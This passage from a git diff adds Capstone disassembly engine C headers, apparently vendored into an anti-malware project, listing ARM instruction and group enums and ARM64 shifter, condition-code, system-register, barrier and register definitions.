ARM_INS_VCLE, + ARM_INS_VCLS, + ARM_INS_VCLT, + ARM_INS_VCLZ, + ARM_INS_VCMP, + ARM_INS_VCMPE, + ARM_INS_VCNT, + ARM_INS_VCVTA, + ARM_INS_VCVTB, + ARM_INS_VCVT, + ARM_INS_VCVTM, + ARM_INS_VCVTN, + ARM_INS_VCVTP, + ARM_INS_VCVTT, + ARM_INS_VDIV, + ARM_INS_VDUP, + ARM_INS_VEOR, + ARM_INS_VEXT, + ARM_INS_VFMA, + ARM_INS_VFMS, + ARM_INS_VFNMA, + ARM_INS_VFNMS, + ARM_INS_VHADD, + ARM_INS_VHSUB, + ARM_INS_VLD1, + ARM_INS_VLD2, + ARM_INS_VLD3, + ARM_INS_VLD4, + ARM_INS_VLDMDB, + ARM_INS_VLDMIA, + ARM_INS_VLDR, + ARM_INS_VMAXNM, + ARM_INS_VMAX, + ARM_INS_VMINNM, + ARM_INS_VMIN, + ARM_INS_VMLA, + ARM_INS_VMLAL, + ARM_INS_VMLS, + ARM_INS_VMLSL, + ARM_INS_VMOVL, + ARM_INS_VMOVN, + ARM_INS_VMSR, + ARM_INS_VMUL, + ARM_INS_VMULL, + ARM_INS_VMVN, + ARM_INS_VNEG, + ARM_INS_VNMLA, + ARM_INS_VNMLS, + ARM_INS_VNMUL, + ARM_INS_VORN, + ARM_INS_VORR, + ARM_INS_VPADAL, + ARM_INS_VPADDL, + ARM_INS_VPADD, + ARM_INS_VPMAX, + ARM_INS_VPMIN, + ARM_INS_VQABS, + ARM_INS_VQADD, + ARM_INS_VQDMLAL, + ARM_INS_VQDMLSL, + ARM_INS_VQDMULH, + ARM_INS_VQDMULL, + ARM_INS_VQMOVUN, + ARM_INS_VQMOVN, + ARM_INS_VQNEG, + ARM_INS_VQRDMULH, + ARM_INS_VQRSHL, + ARM_INS_VQRSHRN, + ARM_INS_VQRSHRUN, + ARM_INS_VQSHL, + ARM_INS_VQSHLU, + 
ARM_INS_VQSHRN, + ARM_INS_VQSHRUN, + ARM_INS_VQSUB, + ARM_INS_VRADDHN, + ARM_INS_VRECPE, + ARM_INS_VRECPS, + ARM_INS_VREV16, + ARM_INS_VREV32, + ARM_INS_VREV64, + ARM_INS_VRHADD, + ARM_INS_VRINTA, + ARM_INS_VRINTM, + ARM_INS_VRINTN, + ARM_INS_VRINTP, + ARM_INS_VRINTR, + ARM_INS_VRINTX, + ARM_INS_VRINTZ, + ARM_INS_VRSHL, + ARM_INS_VRSHRN, + ARM_INS_VRSHR, + ARM_INS_VRSQRTE, + ARM_INS_VRSQRTS, + ARM_INS_VRSRA, + ARM_INS_VRSUBHN, + ARM_INS_VSELEQ, + ARM_INS_VSELGE, + ARM_INS_VSELGT, + ARM_INS_VSELVS, + ARM_INS_VSHLL, + ARM_INS_VSHL, + ARM_INS_VSHRN, + ARM_INS_VSHR, + ARM_INS_VSLI, + ARM_INS_VSQRT, + ARM_INS_VSRA, + ARM_INS_VSRI, + ARM_INS_VST1, + ARM_INS_VST2, + ARM_INS_VST3, + ARM_INS_VST4, + ARM_INS_VSTMDB, + ARM_INS_VSTMIA, + ARM_INS_VSTR, + ARM_INS_VSUB, + ARM_INS_VSUBHN, + ARM_INS_VSUBL, + ARM_INS_VSUBW, + ARM_INS_VSWP, + ARM_INS_VTBL, + ARM_INS_VTBX, + ARM_INS_VCVTR, + ARM_INS_VTRN, + ARM_INS_VTST, + ARM_INS_VUZP, + ARM_INS_VZIP, + ARM_INS_ADDW, + ARM_INS_ASR, + ARM_INS_DCPS1, + ARM_INS_DCPS2, + ARM_INS_DCPS3, + ARM_INS_IT, + ARM_INS_LSL, + ARM_INS_LSR, + ARM_INS_ORN, + ARM_INS_ROR, + ARM_INS_RRX, + ARM_INS_SUBW, + ARM_INS_TBB, + ARM_INS_TBH, + ARM_INS_CBNZ, + ARM_INS_CBZ, + ARM_INS_POP, + ARM_INS_PUSH, + + // special instructions + ARM_INS_NOP, + ARM_INS_YIELD, + ARM_INS_WFE, + ARM_INS_WFI, + ARM_INS_SEV, + ARM_INS_SEVL, + ARM_INS_VPUSH, + ARM_INS_VPOP, + + ARM_INS_ENDING, // <-- mark the end of the list of instructions +} arm_insn; + +/// Group of ARM instructions +typedef enum arm_insn_group { + ARM_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + ARM_GRP_JUMP, ///< = CS_GRP_JUMP + ARM_GRP_CALL, ///< = CS_GRP_CALL + ARM_GRP_INT = 4, ///< = CS_GRP_INT + ARM_GRP_PRIVILEGE = 6, ///< = CS_GRP_PRIVILEGE + ARM_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + ARM_GRP_CRYPTO = 128, + ARM_GRP_DATABARRIER, + ARM_GRP_DIVIDE, + ARM_GRP_FPARMV8, + 
ARM_GRP_MULTPRO, + ARM_GRP_NEON, + ARM_GRP_T2EXTRACTPACK, + ARM_GRP_THUMB2DSP, + ARM_GRP_TRUSTZONE, + ARM_GRP_V4T, + ARM_GRP_V5T, + ARM_GRP_V5TE, + ARM_GRP_V6, + ARM_GRP_V6T2, + ARM_GRP_V7, + ARM_GRP_V8, + ARM_GRP_VFP2, + ARM_GRP_VFP3, + ARM_GRP_VFP4, + ARM_GRP_ARM, + ARM_GRP_MCLASS, + ARM_GRP_NOTMCLASS, + ARM_GRP_THUMB, + ARM_GRP_THUMB1ONLY, + ARM_GRP_THUMB2, + ARM_GRP_PREV8, + ARM_GRP_FPVMLX, + ARM_GRP_MULOPS, + ARM_GRP_CRC, + ARM_GRP_DPVFP, + ARM_GRP_V6M, + ARM_GRP_VIRTUALIZATION, + + ARM_GRP_ENDING, +} arm_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/arm64.h b/ai_anti_malware/capstone/include/capstone/arm64.h new file mode 100644 index 0000000..0309f30 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/arm64.h @@ -0,0 +1,1164 @@ +#ifndef CAPSTONE_ARM64_H +#define CAPSTONE_ARM64_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// ARM64 shift type +typedef enum arm64_shifter { + ARM64_SFT_INVALID = 0, + ARM64_SFT_LSL = 1, + ARM64_SFT_MSL = 2, + ARM64_SFT_LSR = 3, + ARM64_SFT_ASR = 4, + ARM64_SFT_ROR = 5, +} arm64_shifter; + +/// ARM64 extender type +typedef enum arm64_extender { + ARM64_EXT_INVALID = 0, + ARM64_EXT_UXTB = 1, + ARM64_EXT_UXTH = 2, + ARM64_EXT_UXTW = 3, + ARM64_EXT_UXTX = 4, + ARM64_EXT_SXTB = 5, + ARM64_EXT_SXTH = 6, + ARM64_EXT_SXTW = 7, + ARM64_EXT_SXTX = 8, +} arm64_extender; + +/// ARM64 condition code +typedef enum arm64_cc { + ARM64_CC_INVALID = 0, + ARM64_CC_EQ = 1, ///< Equal + ARM64_CC_NE = 2, ///< Not equal: Not equal, or unordered + ARM64_CC_HS = 3, ///< Unsigned higher or same: >, ==, or unordered + ARM64_CC_LO = 4, ///< Unsigned lower or same: Less than + ARM64_CC_MI = 5, ///< Minus, negative: Less than + ARM64_CC_PL = 6, ///< Plus, positive or zero: >, ==, or unordered + ARM64_CC_VS = 7, ///< Overflow: 
Unordered + ARM64_CC_VC = 8, ///< No overflow: Ordered + ARM64_CC_HI = 9, ///< Unsigned higher: Greater than, or unordered + ARM64_CC_LS = 10, ///< Unsigned lower or same: Less than or equal + ARM64_CC_GE = 11, ///< Greater than or equal: Greater than or equal + ARM64_CC_LT = 12, ///< Less than: Less than, or unordered + ARM64_CC_GT = 13, ///< Signed greater than: Greater than + ARM64_CC_LE = 14, ///< Signed less than or equal: <, ==, or unordered + ARM64_CC_AL = 15, ///< Always (unconditional): Always (unconditional) + ARM64_CC_NV = 16, ///< Always (unconditional): Always (unconditional) + //< Note the NV exists purely to disassemble 0b1111. Execution + //< is "always". +} arm64_cc; + +/// System registers +typedef enum arm64_sysreg { + // System registers for MRS + ARM64_SYSREG_INVALID = 0, + ARM64_SYSREG_MDCCSR_EL0 = 0x9808, // 10 011 0000 0001 000 + ARM64_SYSREG_DBGDTRRX_EL0 = 0x9828, // 10 011 0000 0101 000 + ARM64_SYSREG_MDRAR_EL1 = 0x8080, // 10 000 0001 0000 000 + ARM64_SYSREG_OSLSR_EL1 = 0x808c, // 10 000 0001 0001 100 + ARM64_SYSREG_DBGAUTHSTATUS_EL1 = 0x83f6, // 10 000 0111 1110 110 + ARM64_SYSREG_PMCEID0_EL0 = 0xdce6, // 11 011 1001 1100 110 + ARM64_SYSREG_PMCEID1_EL0 = 0xdce7, // 11 011 1001 1100 111 + ARM64_SYSREG_MIDR_EL1 = 0xc000, // 11 000 0000 0000 000 + ARM64_SYSREG_CCSIDR_EL1 = 0xc800, // 11 001 0000 0000 000 + ARM64_SYSREG_CLIDR_EL1 = 0xc801, // 11 001 0000 0000 001 + ARM64_SYSREG_CTR_EL0 = 0xd801, // 11 011 0000 0000 001 + ARM64_SYSREG_MPIDR_EL1 = 0xc005, // 11 000 0000 0000 101 + ARM64_SYSREG_REVIDR_EL1 = 0xc006, // 11 000 0000 0000 110 + ARM64_SYSREG_AIDR_EL1 = 0xc807, // 11 001 0000 0000 111 + ARM64_SYSREG_DCZID_EL0 = 0xd807, // 11 011 0000 0000 111 + ARM64_SYSREG_ID_PFR0_EL1 = 0xc008, // 11 000 0000 0001 000 + ARM64_SYSREG_ID_PFR1_EL1 = 0xc009, // 11 000 0000 0001 001 + ARM64_SYSREG_ID_DFR0_EL1 = 0xc00a, // 11 000 0000 0001 010 + ARM64_SYSREG_ID_AFR0_EL1 = 0xc00b, // 11 000 0000 0001 011 + ARM64_SYSREG_ID_MMFR0_EL1 = 0xc00c, // 11 000 0000 
0001 100 + ARM64_SYSREG_ID_MMFR1_EL1 = 0xc00d, // 11 000 0000 0001 101 + ARM64_SYSREG_ID_MMFR2_EL1 = 0xc00e, // 11 000 0000 0001 110 + ARM64_SYSREG_ID_MMFR3_EL1 = 0xc00f, // 11 000 0000 0001 111 + ARM64_SYSREG_ID_ISAR0_EL1 = 0xc010, // 11 000 0000 0010 000 + ARM64_SYSREG_ID_ISAR1_EL1 = 0xc011, // 11 000 0000 0010 001 + ARM64_SYSREG_ID_ISAR2_EL1 = 0xc012, // 11 000 0000 0010 010 + ARM64_SYSREG_ID_ISAR3_EL1 = 0xc013, // 11 000 0000 0010 011 + ARM64_SYSREG_ID_ISAR4_EL1 = 0xc014, // 11 000 0000 0010 100 + ARM64_SYSREG_ID_ISAR5_EL1 = 0xc015, // 11 000 0000 0010 101 + ARM64_SYSREG_ID_A64PFR0_EL1 = 0xc020, // 11 000 0000 0100 000 + ARM64_SYSREG_ID_A64PFR1_EL1 = 0xc021, // 11 000 0000 0100 001 + ARM64_SYSREG_ID_A64DFR0_EL1 = 0xc028, // 11 000 0000 0101 000 + ARM64_SYSREG_ID_A64DFR1_EL1 = 0xc029, // 11 000 0000 0101 001 + ARM64_SYSREG_ID_A64AFR0_EL1 = 0xc02c, // 11 000 0000 0101 100 + ARM64_SYSREG_ID_A64AFR1_EL1 = 0xc02d, // 11 000 0000 0101 101 + ARM64_SYSREG_ID_A64ISAR0_EL1 = 0xc030, // 11 000 0000 0110 000 + ARM64_SYSREG_ID_A64ISAR1_EL1 = 0xc031, // 11 000 0000 0110 001 + ARM64_SYSREG_ID_A64MMFR0_EL1 = 0xc038, // 11 000 0000 0111 000 + ARM64_SYSREG_ID_A64MMFR1_EL1 = 0xc039, // 11 000 0000 0111 001 + ARM64_SYSREG_MVFR0_EL1 = 0xc018, // 11 000 0000 0011 000 + ARM64_SYSREG_MVFR1_EL1 = 0xc019, // 11 000 0000 0011 001 + ARM64_SYSREG_MVFR2_EL1 = 0xc01a, // 11 000 0000 0011 010 + ARM64_SYSREG_RVBAR_EL1 = 0xc601, // 11 000 1100 0000 001 + ARM64_SYSREG_RVBAR_EL2 = 0xe601, // 11 100 1100 0000 001 + ARM64_SYSREG_RVBAR_EL3 = 0xf601, // 11 110 1100 0000 001 + ARM64_SYSREG_ISR_EL1 = 0xc608, // 11 000 1100 0001 000 + ARM64_SYSREG_CNTPCT_EL0 = 0xdf01, // 11 011 1110 0000 001 + ARM64_SYSREG_CNTVCT_EL0 = 0xdf02, // 11 011 1110 0000 010 + + // Trace registers + ARM64_SYSREG_TRCSTATR = 0x8818, // 10 001 0000 0011 000 + ARM64_SYSREG_TRCIDR8 = 0x8806, // 10 001 0000 0000 110 + ARM64_SYSREG_TRCIDR9 = 0x880e, // 10 001 0000 0001 110 + ARM64_SYSREG_TRCIDR10 = 0x8816, // 10 001 0000 0010 110 + 
ARM64_SYSREG_TRCIDR11 = 0x881e, // 10 001 0000 0011 110 + ARM64_SYSREG_TRCIDR12 = 0x8826, // 10 001 0000 0100 110 + ARM64_SYSREG_TRCIDR13 = 0x882e, // 10 001 0000 0101 110 + ARM64_SYSREG_TRCIDR0 = 0x8847, // 10 001 0000 1000 111 + ARM64_SYSREG_TRCIDR1 = 0x884f, // 10 001 0000 1001 111 + ARM64_SYSREG_TRCIDR2 = 0x8857, // 10 001 0000 1010 111 + ARM64_SYSREG_TRCIDR3 = 0x885f, // 10 001 0000 1011 111 + ARM64_SYSREG_TRCIDR4 = 0x8867, // 10 001 0000 1100 111 + ARM64_SYSREG_TRCIDR5 = 0x886f, // 10 001 0000 1101 111 + ARM64_SYSREG_TRCIDR6 = 0x8877, // 10 001 0000 1110 111 + ARM64_SYSREG_TRCIDR7 = 0x887f, // 10 001 0000 1111 111 + ARM64_SYSREG_TRCOSLSR = 0x888c, // 10 001 0001 0001 100 + ARM64_SYSREG_TRCPDSR = 0x88ac, // 10 001 0001 0101 100 + ARM64_SYSREG_TRCDEVAFF0 = 0x8bd6, // 10 001 0111 1010 110 + ARM64_SYSREG_TRCDEVAFF1 = 0x8bde, // 10 001 0111 1011 110 + ARM64_SYSREG_TRCLSR = 0x8bee, // 10 001 0111 1101 110 + ARM64_SYSREG_TRCAUTHSTATUS = 0x8bf6, // 10 001 0111 1110 110 + ARM64_SYSREG_TRCDEVARCH = 0x8bfe, // 10 001 0111 1111 110 + ARM64_SYSREG_TRCDEVID = 0x8b97, // 10 001 0111 0010 111 + ARM64_SYSREG_TRCDEVTYPE = 0x8b9f, // 10 001 0111 0011 111 + ARM64_SYSREG_TRCPIDR4 = 0x8ba7, // 10 001 0111 0100 111 + ARM64_SYSREG_TRCPIDR5 = 0x8baf, // 10 001 0111 0101 111 + ARM64_SYSREG_TRCPIDR6 = 0x8bb7, // 10 001 0111 0110 111 + ARM64_SYSREG_TRCPIDR7 = 0x8bbf, // 10 001 0111 0111 111 + ARM64_SYSREG_TRCPIDR0 = 0x8bc7, // 10 001 0111 1000 111 + ARM64_SYSREG_TRCPIDR1 = 0x8bcf, // 10 001 0111 1001 111 + ARM64_SYSREG_TRCPIDR2 = 0x8bd7, // 10 001 0111 1010 111 + ARM64_SYSREG_TRCPIDR3 = 0x8bdf, // 10 001 0111 1011 111 + ARM64_SYSREG_TRCCIDR0 = 0x8be7, // 10 001 0111 1100 111 + ARM64_SYSREG_TRCCIDR1 = 0x8bef, // 10 001 0111 1101 111 + ARM64_SYSREG_TRCCIDR2 = 0x8bf7, // 10 001 0111 1110 111 + ARM64_SYSREG_TRCCIDR3 = 0x8bff, // 10 001 0111 1111 111 + + // GICv3 registers + ARM64_SYSREG_ICC_IAR1_EL1 = 0xc660, // 11 000 1100 1100 000 + ARM64_SYSREG_ICC_IAR0_EL1 = 0xc640, // 11 000 1100 1000 
000 + ARM64_SYSREG_ICC_HPPIR1_EL1 = 0xc662, // 11 000 1100 1100 010 + ARM64_SYSREG_ICC_HPPIR0_EL1 = 0xc642, // 11 000 1100 1000 010 + ARM64_SYSREG_ICC_RPR_EL1 = 0xc65b, // 11 000 1100 1011 011 + ARM64_SYSREG_ICH_VTR_EL2 = 0xe659, // 11 100 1100 1011 001 + ARM64_SYSREG_ICH_EISR_EL2 = 0xe65b, // 11 100 1100 1011 011 + ARM64_SYSREG_ICH_ELSR_EL2 = 0xe65d, // 11 100 1100 1011 101 +} arm64_sysreg; + +typedef enum arm64_msr_reg { + // System registers for MSR + ARM64_SYSREG_DBGDTRTX_EL0 = 0x9828, // 10 011 0000 0101 000 + ARM64_SYSREG_OSLAR_EL1 = 0x8084, // 10 000 0001 0000 100 + ARM64_SYSREG_PMSWINC_EL0 = 0xdce4, // 11 011 1001 1100 100 + + // Trace Registers + ARM64_SYSREG_TRCOSLAR = 0x8884, // 10 001 0001 0000 100 + ARM64_SYSREG_TRCLAR = 0x8be6, // 10 001 0111 1100 110 + + // GICv3 registers + ARM64_SYSREG_ICC_EOIR1_EL1 = 0xc661, // 11 000 1100 1100 001 + ARM64_SYSREG_ICC_EOIR0_EL1 = 0xc641, // 11 000 1100 1000 001 + ARM64_SYSREG_ICC_DIR_EL1 = 0xc659, // 11 000 1100 1011 001 + ARM64_SYSREG_ICC_SGI1R_EL1 = 0xc65d, // 11 000 1100 1011 101 + ARM64_SYSREG_ICC_ASGI1R_EL1 = 0xc65e, // 11 000 1100 1011 110 + ARM64_SYSREG_ICC_SGI0R_EL1 = 0xc65f, // 11 000 1100 1011 111 +} arm64_msr_reg; + +/// System PState Field (MSR instruction) +typedef enum arm64_pstate { + ARM64_PSTATE_INVALID = 0, + ARM64_PSTATE_SPSEL = 0x05, + ARM64_PSTATE_DAIFSET = 0x1e, + ARM64_PSTATE_DAIFCLR = 0x1f +} arm64_pstate; + +/// Vector arrangement specifier (for FloatingPoint/Advanced SIMD insn) +typedef enum arm64_vas { + ARM64_VAS_INVALID = 0, + ARM64_VAS_8B, + ARM64_VAS_16B, + ARM64_VAS_4H, + ARM64_VAS_8H, + ARM64_VAS_2S, + ARM64_VAS_4S, + ARM64_VAS_1D, + ARM64_VAS_2D, + ARM64_VAS_1Q, +} arm64_vas; + +/// Vector element size specifier +typedef enum arm64_vess { + ARM64_VESS_INVALID = 0, + ARM64_VESS_B, + ARM64_VESS_H, + ARM64_VESS_S, + ARM64_VESS_D, +} arm64_vess; + +/// Memory barrier operands +typedef enum arm64_barrier_op { + ARM64_BARRIER_INVALID = 0, + ARM64_BARRIER_OSHLD = 0x1, + 
ARM64_BARRIER_OSHST = 0x2, + ARM64_BARRIER_OSH = 0x3, + ARM64_BARRIER_NSHLD = 0x5, + ARM64_BARRIER_NSHST = 0x6, + ARM64_BARRIER_NSH = 0x7, + ARM64_BARRIER_ISHLD = 0x9, + ARM64_BARRIER_ISHST = 0xa, + ARM64_BARRIER_ISH = 0xb, + ARM64_BARRIER_LD = 0xd, + ARM64_BARRIER_ST = 0xe, + ARM64_BARRIER_SY = 0xf +} arm64_barrier_op; + +/// Operand type for instruction's operands +typedef enum arm64_op_type { + ARM64_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + ARM64_OP_REG, ///< = CS_OP_REG (Register operand). + ARM64_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + ARM64_OP_MEM, ///< = CS_OP_MEM (Memory operand). + ARM64_OP_FP, ///< = CS_OP_FP (Floating-Point operand). + ARM64_OP_CIMM = 64, ///< C-Immediate + ARM64_OP_REG_MRS, ///< MRS register operand. + ARM64_OP_REG_MSR, ///< MSR register operand. + ARM64_OP_PSTATE, ///< PState operand. + ARM64_OP_SYS, ///< SYS operand for IC/DC/AT/TLBI instructions. + ARM64_OP_PREFETCH, ///< Prefetch operand (PRFM). + ARM64_OP_BARRIER, ///< Memory barrier operand (ISB/DMB/DSB instructions). 
+} arm64_op_type; + +/// TLBI operations +typedef enum arm64_tlbi_op { + ARM64_TLBI_INVALID = 0, + ARM64_TLBI_VMALLE1IS, + ARM64_TLBI_VAE1IS, + ARM64_TLBI_ASIDE1IS, + ARM64_TLBI_VAAE1IS, + ARM64_TLBI_VALE1IS, + ARM64_TLBI_VAALE1IS, + ARM64_TLBI_ALLE2IS, + ARM64_TLBI_VAE2IS, + ARM64_TLBI_ALLE1IS, + ARM64_TLBI_VALE2IS, + ARM64_TLBI_VMALLS12E1IS, + ARM64_TLBI_ALLE3IS, + ARM64_TLBI_VAE3IS, + ARM64_TLBI_VALE3IS, + ARM64_TLBI_IPAS2E1IS, + ARM64_TLBI_IPAS2LE1IS, + ARM64_TLBI_IPAS2E1, + ARM64_TLBI_IPAS2LE1, + ARM64_TLBI_VMALLE1, + ARM64_TLBI_VAE1, + ARM64_TLBI_ASIDE1, + ARM64_TLBI_VAAE1, + ARM64_TLBI_VALE1, + ARM64_TLBI_VAALE1, + ARM64_TLBI_ALLE2, + ARM64_TLBI_VAE2, + ARM64_TLBI_ALLE1, + ARM64_TLBI_VALE2, + ARM64_TLBI_VMALLS12E1, + ARM64_TLBI_ALLE3, + ARM64_TLBI_VAE3, + ARM64_TLBI_VALE3, +} arm64_tlbi_op; + +/// AT operations +typedef enum arm64_at_op { + ARM64_AT_S1E1R, + ARM64_AT_S1E1W, + ARM64_AT_S1E0R, + ARM64_AT_S1E0W, + ARM64_AT_S1E2R, + ARM64_AT_S1E2W, + ARM64_AT_S12E1R, + ARM64_AT_S12E1W, + ARM64_AT_S12E0R, + ARM64_AT_S12E0W, + ARM64_AT_S1E3R, + ARM64_AT_S1E3W, +} arm64_at_op; + +/// DC operations +typedef enum arm64_dc_op { + ARM64_DC_INVALID = 0, + ARM64_DC_ZVA, + ARM64_DC_IVAC, + ARM64_DC_ISW, + ARM64_DC_CVAC, + ARM64_DC_CSW, + ARM64_DC_CVAU, + ARM64_DC_CIVAC, + ARM64_DC_CISW, +} arm64_dc_op; + +/// IC operations +typedef enum arm64_ic_op { + ARM64_IC_INVALID = 0, + ARM64_IC_IALLUIS, + ARM64_IC_IALLU, + ARM64_IC_IVAU, +} arm64_ic_op; + +/// Prefetch operations (PRFM) +typedef enum arm64_prefetch_op { + ARM64_PRFM_INVALID = 0, + ARM64_PRFM_PLDL1KEEP = 0x00 + 1, + ARM64_PRFM_PLDL1STRM = 0x01 + 1, + ARM64_PRFM_PLDL2KEEP = 0x02 + 1, + ARM64_PRFM_PLDL2STRM = 0x03 + 1, + ARM64_PRFM_PLDL3KEEP = 0x04 + 1, + ARM64_PRFM_PLDL3STRM = 0x05 + 1, + ARM64_PRFM_PLIL1KEEP = 0x08 + 1, + ARM64_PRFM_PLIL1STRM = 0x09 + 1, + ARM64_PRFM_PLIL2KEEP = 0x0a + 1, + ARM64_PRFM_PLIL2STRM = 0x0b + 1, + ARM64_PRFM_PLIL3KEEP = 0x0c + 1, + ARM64_PRFM_PLIL3STRM = 0x0d + 1, + ARM64_PRFM_PSTL1KEEP = 
0x10 + 1, + ARM64_PRFM_PSTL1STRM = 0x11 + 1, + ARM64_PRFM_PSTL2KEEP = 0x12 + 1, + ARM64_PRFM_PSTL2STRM = 0x13 + 1, + ARM64_PRFM_PSTL3KEEP = 0x14 + 1, + ARM64_PRFM_PSTL3STRM = 0x15 + 1, +} arm64_prefetch_op; + + +/// ARM64 registers +typedef enum arm64_reg { + ARM64_REG_INVALID = 0, + + ARM64_REG_X29, + ARM64_REG_X30, + ARM64_REG_NZCV, + ARM64_REG_SP, + ARM64_REG_WSP, + ARM64_REG_WZR, + ARM64_REG_XZR, + ARM64_REG_B0, + ARM64_REG_B1, + ARM64_REG_B2, + ARM64_REG_B3, + ARM64_REG_B4, + ARM64_REG_B5, + ARM64_REG_B6, + ARM64_REG_B7, + ARM64_REG_B8, + ARM64_REG_B9, + ARM64_REG_B10, + ARM64_REG_B11, + ARM64_REG_B12, + ARM64_REG_B13, + ARM64_REG_B14, + ARM64_REG_B15, + ARM64_REG_B16, + ARM64_REG_B17, + ARM64_REG_B18, + ARM64_REG_B19, + ARM64_REG_B20, + ARM64_REG_B21, + ARM64_REG_B22, + ARM64_REG_B23, + ARM64_REG_B24, + ARM64_REG_B25, + ARM64_REG_B26, + ARM64_REG_B27, + ARM64_REG_B28, + ARM64_REG_B29, + ARM64_REG_B30, + ARM64_REG_B31, + ARM64_REG_D0, + ARM64_REG_D1, + ARM64_REG_D2, + ARM64_REG_D3, + ARM64_REG_D4, + ARM64_REG_D5, + ARM64_REG_D6, + ARM64_REG_D7, + ARM64_REG_D8, + ARM64_REG_D9, + ARM64_REG_D10, + ARM64_REG_D11, + ARM64_REG_D12, + ARM64_REG_D13, + ARM64_REG_D14, + ARM64_REG_D15, + ARM64_REG_D16, + ARM64_REG_D17, + ARM64_REG_D18, + ARM64_REG_D19, + ARM64_REG_D20, + ARM64_REG_D21, + ARM64_REG_D22, + ARM64_REG_D23, + ARM64_REG_D24, + ARM64_REG_D25, + ARM64_REG_D26, + ARM64_REG_D27, + ARM64_REG_D28, + ARM64_REG_D29, + ARM64_REG_D30, + ARM64_REG_D31, + ARM64_REG_H0, + ARM64_REG_H1, + ARM64_REG_H2, + ARM64_REG_H3, + ARM64_REG_H4, + ARM64_REG_H5, + ARM64_REG_H6, + ARM64_REG_H7, + ARM64_REG_H8, + ARM64_REG_H9, + ARM64_REG_H10, + ARM64_REG_H11, + ARM64_REG_H12, + ARM64_REG_H13, + ARM64_REG_H14, + ARM64_REG_H15, + ARM64_REG_H16, + ARM64_REG_H17, + ARM64_REG_H18, + ARM64_REG_H19, + ARM64_REG_H20, + ARM64_REG_H21, + ARM64_REG_H22, + ARM64_REG_H23, + ARM64_REG_H24, + ARM64_REG_H25, + ARM64_REG_H26, + ARM64_REG_H27, + ARM64_REG_H28, + ARM64_REG_H29, + ARM64_REG_H30, + 
ARM64_REG_H31, + ARM64_REG_Q0, + ARM64_REG_Q1, + ARM64_REG_Q2, + ARM64_REG_Q3, + ARM64_REG_Q4, + ARM64_REG_Q5, + ARM64_REG_Q6, + ARM64_REG_Q7, + ARM64_REG_Q8, + ARM64_REG_Q9, + ARM64_REG_Q10, + ARM64_REG_Q11, + ARM64_REG_Q12, + ARM64_REG_Q13, + ARM64_REG_Q14, + ARM64_REG_Q15, + ARM64_REG_Q16, + ARM64_REG_Q17, + ARM64_REG_Q18, + ARM64_REG_Q19, + ARM64_REG_Q20, + ARM64_REG_Q21, + ARM64_REG_Q22, + ARM64_REG_Q23, + ARM64_REG_Q24, + ARM64_REG_Q25, + ARM64_REG_Q26, + ARM64_REG_Q27, + ARM64_REG_Q28, + ARM64_REG_Q29, + ARM64_REG_Q30, + ARM64_REG_Q31, + ARM64_REG_S0, + ARM64_REG_S1, + ARM64_REG_S2, + ARM64_REG_S3, + ARM64_REG_S4, + ARM64_REG_S5, + ARM64_REG_S6, + ARM64_REG_S7, + ARM64_REG_S8, + ARM64_REG_S9, + ARM64_REG_S10, + ARM64_REG_S11, + ARM64_REG_S12, + ARM64_REG_S13, + ARM64_REG_S14, + ARM64_REG_S15, + ARM64_REG_S16, + ARM64_REG_S17, + ARM64_REG_S18, + ARM64_REG_S19, + ARM64_REG_S20, + ARM64_REG_S21, + ARM64_REG_S22, + ARM64_REG_S23, + ARM64_REG_S24, + ARM64_REG_S25, + ARM64_REG_S26, + ARM64_REG_S27, + ARM64_REG_S28, + ARM64_REG_S29, + ARM64_REG_S30, + ARM64_REG_S31, + ARM64_REG_W0, + ARM64_REG_W1, + ARM64_REG_W2, + ARM64_REG_W3, + ARM64_REG_W4, + ARM64_REG_W5, + ARM64_REG_W6, + ARM64_REG_W7, + ARM64_REG_W8, + ARM64_REG_W9, + ARM64_REG_W10, + ARM64_REG_W11, + ARM64_REG_W12, + ARM64_REG_W13, + ARM64_REG_W14, + ARM64_REG_W15, + ARM64_REG_W16, + ARM64_REG_W17, + ARM64_REG_W18, + ARM64_REG_W19, + ARM64_REG_W20, + ARM64_REG_W21, + ARM64_REG_W22, + ARM64_REG_W23, + ARM64_REG_W24, + ARM64_REG_W25, + ARM64_REG_W26, + ARM64_REG_W27, + ARM64_REG_W28, + ARM64_REG_W29, + ARM64_REG_W30, + ARM64_REG_X0, + ARM64_REG_X1, + ARM64_REG_X2, + ARM64_REG_X3, + ARM64_REG_X4, + ARM64_REG_X5, + ARM64_REG_X6, + ARM64_REG_X7, + ARM64_REG_X8, + ARM64_REG_X9, + ARM64_REG_X10, + ARM64_REG_X11, + ARM64_REG_X12, + ARM64_REG_X13, + ARM64_REG_X14, + ARM64_REG_X15, + ARM64_REG_X16, + ARM64_REG_X17, + ARM64_REG_X18, + ARM64_REG_X19, + ARM64_REG_X20, + ARM64_REG_X21, + ARM64_REG_X22, + ARM64_REG_X23, + 
ARM64_REG_X24, + ARM64_REG_X25, + ARM64_REG_X26, + ARM64_REG_X27, + ARM64_REG_X28, + + ARM64_REG_V0, + ARM64_REG_V1, + ARM64_REG_V2, + ARM64_REG_V3, + ARM64_REG_V4, + ARM64_REG_V5, + ARM64_REG_V6, + ARM64_REG_V7, + ARM64_REG_V8, + ARM64_REG_V9, + ARM64_REG_V10, + ARM64_REG_V11, + ARM64_REG_V12, + ARM64_REG_V13, + ARM64_REG_V14, + ARM64_REG_V15, + ARM64_REG_V16, + ARM64_REG_V17, + ARM64_REG_V18, + ARM64_REG_V19, + ARM64_REG_V20, + ARM64_REG_V21, + ARM64_REG_V22, + ARM64_REG_V23, + ARM64_REG_V24, + ARM64_REG_V25, + ARM64_REG_V26, + ARM64_REG_V27, + ARM64_REG_V28, + ARM64_REG_V29, + ARM64_REG_V30, + ARM64_REG_V31, + + ARM64_REG_ENDING, // <-- mark the end of the list of registers + + // alias registers + + ARM64_REG_IP0 = ARM64_REG_X16, + ARM64_REG_IP1 = ARM64_REG_X17, + 